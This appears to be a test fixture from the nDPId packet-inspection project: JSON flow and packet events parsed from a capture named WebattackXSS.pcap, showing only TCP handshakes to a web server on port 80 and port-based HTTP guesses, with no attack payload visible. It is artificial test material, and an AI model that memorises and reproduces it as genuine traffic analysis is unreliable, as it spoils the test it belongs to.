-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1499347636429,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347636429,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AchAAD4GxAisEAABwKgKMueyAFDHeXU3AAAAAKACchDEFQAAAgQFtAQCCAoBO3T\/AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5600,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":2,"flow_last_seen":1499347636429,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347636429,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ57LbsY4Yx3l1OKAScSAQ0QAAAgQFtAQCCAoD5UZ0ATt0\/wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5602,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":3,"flow_last_seen":1499347636431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347636431,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AclAAD4GxA+sEAABwKgKMueyAFDHeXU427GOGYAQAOWv1wAAAQEICgE7dQAD5UZ0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347637687,"flow_last_seen":1499347637687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1499347637687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347637687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0xAAD4GaoSsEAABwKgKMufAAFAySC12AAAAAKACchCfvwAAAgQFtAQCCAoBO3Y6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":2,"flow_last_seen":1499347637687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347637687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ58BffWshMkgtd6AScSCKawAAAgQFtAQCCAoD5UevATt2OgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":3,"flow_last_seen":1499347637688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347637688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W01AAD4GaousEAABwKgKMufAAFAySC13X31rIoAQAOUpcwAAAQEICgE7djoD5Uev"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347640199,"flow_last_seen":1499347640199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347640199,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1499347640199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347640199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81CZAAD4G8amsEAABwKgKMufaAFCvK6yIAAAAAKACchChOwAAAgQFtAQCCAoBO3iuAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":2,"flow_last_seen":1499347640199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347640199,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ59rwV\/OuryusiaAScSBwCwAAAgQFtAQCCAoD5UojATt4rgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5632,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":3,"flow_last_seen":1499347640200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347640200,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01CdAAD4G8bCsEAABwKgKMufaAFCvK6yJ8Ffzr4AQAOUPEwAAAQEICgE7eK4D5Uoj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347641440,"flow_last_seen":1499347641440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347641440,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1499347641440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347641440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tE5AAD4GEYKsEAABwKgKMufoAFB3dM2qAAAAAKACchC2jAAAAgQFtAQCCAoBO3nkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":2,"flow_last_seen":1499347641440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347641440,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5+hNQiold3TNq6AScSDwxQAAAgQFtAQCCAoD5UtZATt55AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":3,"flow_last_seen":1499347641442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347641442,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tE9AAD4GEYmsEAABwKgKMufoAFB3dM2rTUIqJoAQAOWPzQAAAQEICgE7eeQD5UtZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347642716,"flow_last_seen":1499347642716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347642716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1499347642716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347642716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SnNAAD4Ge12sEAABwKgKMuf2AFDcdDFQAAAAAKACchDsmQAAAgQFtAQCCAoBO3sjAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":2,"flow_last_seen":1499347642716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347642716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5\/aPKcRJ3HQxUaAScSBJiAAAAgQFtAQCCAoD5UyYATt7IwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":3,"flow_last_seen":1499347642717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347642717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnRAAD4Ge2SsEAABwKgKMuf2AFDcdDFRjynESoAQAOXojwAAAQEICgE7eyMD5UyY"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347645232,"flow_last_seen":1499347645232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347645232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1499347645232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347645232,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rz5AAD4GFpKsEAABwKgKMugQAFBzf9KmAAAAAKACchCxqQAAAgQFtAQCCAoBO32YAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5673,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":2,"flow_last_seen":1499347645232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347645232,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6BD8Et+tc3\/Sp6AScSCD1QAAAgQFtAQCCAoD5U8NATt9mAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5675,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":3,"flow_last_seen":1499347645234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347645234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rz9AAD4GFpmsEAABwKgKMugQAFBzf9Kn\/BLfroAQAOUi3QAAAQEICgE7fZgD5U8N"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347646486,"flow_last_seen":1499347646486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347646486,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1499347646486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347646486,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uWhAAD4GDGisEAABwKgKMugeAFCoNce5AAAAAKACchCGmQAAAgQFtAQCCAoBO37RAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":2,"flow_last_seen":1499347646486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347646486,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6B6AVzWvqDXHuqAScSB9RgAAAgQFtAQCCAoD5VBGATt+0QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":3,"flow_last_seen":1499347646488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347646488,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uWlAAD4GDG+sEAABwKgKMugeAFCoNce6gFc1sIAQAOUcTQAAAQEICgE7ftID5VBG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347647733,"flow_last_seen":1499347647733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1499347647733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347647733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cdhAAD4GU\/isEAABwKgKMugsAFDFxvHRAAAAAKACchA9qgAAAgQFtAQCCAoBO4AJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":2,"flow_last_seen":1499347647733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347647733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6CyQ1\/Exxcbx0qAScSBnHAAAAgQFtAQCCAoD5VF+ATuACQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":3,"flow_last_seen":1499347647734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347647734,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cdlAAD4GU\/+sEAABwKgKMugsAFDFxvHSkNfxMoAQAOUGJAAAAQEICgE7gAkD5VF+"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 